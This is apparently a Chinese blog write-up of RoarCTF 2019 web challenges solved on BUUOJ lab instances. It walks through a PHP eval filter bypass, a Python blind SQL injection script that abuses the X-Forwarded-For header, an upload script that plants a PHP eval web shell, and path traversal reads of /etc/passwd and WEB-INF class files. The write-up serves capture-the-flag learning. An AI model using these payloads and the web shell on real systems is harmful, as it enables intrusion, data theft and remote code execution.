友情提示:本文最后更新于 469 天前,文中的内容可能已有所发展或发生改变。 [RoarCTF 2019]Easy Calc 查看源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<!--I've set up WAF to ensure security.-->
< script >
$ ( '#calc' ). submit ( function (){
$ . ajax ({
url : "calc.php?num=" + encodeURIComponent ( $ ( "#content" ). val ()),
type : 'GET' ,
success : function ( data ){
$ ( "#result" ). html ( `<div class="alert alert-success">
<strong>答案:</strong> ${ data }
</div>` );
},
error : function (){
alert ( "这啥?算不来!" );
}
})
return false ;
})
</ script >
/calc.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<? php
error_reporting ( 0 );
if ( ! isset ( $_GET [ 'num' ])){
show_source ( __FILE__ );
} else {
$str = $_GET [ 'num' ];
$blacklist = [ ' ' , '\t' , '\r' , '\n' , '\'' , '"' , '`' , '\[' , '\]' , '\$' , '\\' , '\^' ];
foreach ( $blacklist as $blackitem ) {
if ( preg_match ( '/' . $blackitem . '/m' , $str )) {
die ( "what are you want to do?" );
}
}
eval ( 'echo ' . $str . ';' );
}
?>
首先我们要绕过这句
1
2
3
4
5
url:"calc.php?num="+encodeURIComponent($("#content").val())
encodeURIComponent除了部分内容,都会被url编码
$("#content")相当于document.getElementById(“content”);
$("#content").val()相当于 document.getElementById(“content”).value;
php解析规则为
删除空白符 将某些字符转换为下划线(包括空格) 那么我们如果在num前面加一个空格,就无法解析到num,然后就绕过了
过滤的命令还是挺多的只能读文件然后读目录了
写个脚本来绕过
1
2
3
4
5
6
7
8
str = "/f1agg"
output = ""
for i in str :
output += "chr( {} )." . format ( ord ( i ))
output = output [: - 1 ]
print ( output )
1
2
3
http : // node5 . buuoj . cn : 25210 / calc . php ? num = var_dump ( scandir ( chr ( 47 )));
http : // node5 . buuoj . cn : 25210 / calc . php ? num = var_dump ( show_source ( chr ( 47 ) . chr ( 102 ) . chr ( 49 ) . chr ( 97 ) . chr ( 103 ) . chr ( 103 )));
[RoarCTF 2019]Online Proxy 啥也没有抓包看看
1
2
3
4
<!-- Debug Info:
Duration: 0.018837928771973 s
Current Ip: 192.168.122.14
Last Ip: 127.0.0.1 -->
发现Last Ip可控,如果注入结果为真,那么就有Last Ip: 1
这个怎么说,戏称"三次注入"?
先进行sql注入,然后随便注入但是不要写1或者0,知道第三次注入结果若返回为
Last Ip: 1,那么sql注入成功,其中cookie不能少
写脚本
中途出了一点小意外,但是debug就好了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
url = "http://node5.buuoj.cn:26721/"
flag = ""
i = 0
header = {
"X-Forwarded-For" : "" ,
"Cookie" : "track_uuid=92c3a573-5f45-4388-bfd9-64446845bd7d"
}
# payload= "0' or ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))>{} or '0"
# payload= "0' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='F4l9_D4t4B45e')),{},1))>{} or '0"
# payload= "0' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F4l9_t4b1e')),{},1))>{} or '0"
payload = "0' or ascii(substr((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)), {} ,1))> {} or '0"
while True :
i += 1
high = 127
tail = 32
while tail < high :
mid = ( high + tail ) // 2
payload_x = payload . format ( i , mid )
header [ "X-Forwarded-For" ] = payload_x
#print(header["X-Forwarded-For"])
r = requests . get ( url = url , headers = header )
header [ "X-Forwarded-For" ] = "baozongwi"
r = requests . get ( url = url , headers = header )
r = requests . get ( url = url , headers = header )
if "Last Ip: 1" in r . text :
tail = mid + 1
else :
high = mid
if tail != 32 :
flag += chr ( tail )
else :
break
print ( " \r " + flag , end = "" )
还要注意的就是有个假flag,但是没啥影响
[RoarCTF 2019]PHPShe phar反序列化,不是哥们,这东西怎么到处都是,又欠着一道
[RoarCTF 2019]Simple Upload 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<? php
namespace Home\Controller ;
use Think\Controller ;
class IndexController extends Controller
{
public function index ()
{
show_source ( __FILE__ );
}
public function upload ()
{
$uploadFile = $_FILES [ 'file' ] ;
if ( strstr ( strtolower ( $uploadFile [ 'name' ]), ".php" ) ) {
return false ;
}
$upload = new \Think\Upload (); // 实例化上传类
$upload -> maxSize = 4096 ; // 设置附件上传大小
$upload -> allowExts = array ( 'jpg' , 'gif' , 'png' , 'jpeg' ); // 设置附件上传类型
$upload -> rootPath = './Public/Uploads/' ; // 设置附件上传目录
$upload -> savePath = '' ; // 设置附件上传子目录
$info = $upload -> upload () ;
if ( ! $info ) { // 上传错误提示错误信息
$this -> error ( $upload -> getError ());
return ;
} else { // 上传成功 获取上传文件信息
$url = __ROOT__ . substr ( $upload -> rootPath , 1 ) . $info [ 'file' ][ 'savepath' ] . $info [ 'file' ][ 'savename' ] ;
echo json_encode ( array ( "url" => $url , "success" => 1 ));
}
}
}
一个tp框架上传漏洞,默认上传路径为/home/index/upload
模糊匹配我们直接就上传成功了
1
2
3
4
5
6
import requests
url = "http://f98f5ce4-ead3-4e0a-84aa-82accb68e463.node5.buuoj.cn:81/index.php/home/index/upload/"
s = requests . Session ()
files = { "file" : ( "shell.<>php" , "<?php @eval($_POST['a']);?>" )}
r = requests . post ( url , files = files )
print ( r . text )
但是不懂为啥直接就给flag了
[RoarCTF 2019]Easy Java 直接用常用密码
1
password=admin888&username=admin
但是没啥用
回去F12
1
< center >< p >< a href = "Download?filename=help.docx" target = "_blank" > help</ a ></ p ></ center >
1
2
3
java . io . FileNotFoundException :{ / etc / passwd }
http : // 3 c9543b8 - d8b4 - 439 b - 8173 - 8e9 bf63e6387 . node5 . buuoj . cn : 81 / Download ? filename =/ etc / passwd
这里来了解一些Java文件知识
WEB-INF/web.xml泄露 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。 /WEB-INF/database.properties:数据库配置文件 漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码 然后我发现原来filename要POST传参
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns= "http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi= "http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation= "http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version= "4.0" >
<welcome-file-list>
<welcome-file> Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name> IndexController</servlet-name>
<servlet-class> com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name> IndexController</servlet-name>
<url-pattern> /Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name> LoginController</servlet-name>
<servlet-class> com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name> LoginController</servlet-name>
<url-pattern> /Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name> DownloadController</servlet-name>
<servlet-class> com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name> DownloadController</servlet-name>
<url-pattern> /Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name> FlagController</servlet-name>
<servlet-class> com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name> FlagController</servlet-name>
<url-pattern> /Flag</url-pattern>
</servlet-mapping>
</web-app>
查看FlagController
1
2
3
http : // 3 c9543b8 - d8b4 - 439 b - 8173 - 8e9 bf63e6387 . node5 . buuoj . cn : 81 / Download
POST :
filename =/ WEB - INF / classes / com / wm / ctf / FlagController . class
然后可以反编码也可以直接看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package defpackage ;
import java.io.IOException ;
import javax.servlet.ServletException ;
import javax.servlet.annotation.WebServlet ;
import javax.servlet.http.HttpServlet ;
import javax.servlet.http.HttpServletRequest ;
import javax.servlet.http.HttpServletResponse ;
@WebServlet ( name = "FlagController" )
/* renamed from: FlagController reason: default package */
/* loaded from: _WEB-INF_classes_com_wm_ctf_FlagController.class */
public class FlagController extends HttpServlet {
String flag = "ZmxhZ3tiMDUyZjE3Ni00Y2FmLTRiNzgtYTIzMy03ODhlNTc1YmU4NTV9Cg==" ;
protected void doGet ( HttpServletRequest httpServletRequest , HttpServletResponse httpServletResponse ) throws ServletException , IOException {
httpServletResponse . getWriter (). print ( "<h1>Flag is nearby ~ Come on! ! !</h1>" );
}
}
[RoarCTF 2019]Dist golang的题,并且是SQL注入外加session伪造等等姿势,相当硬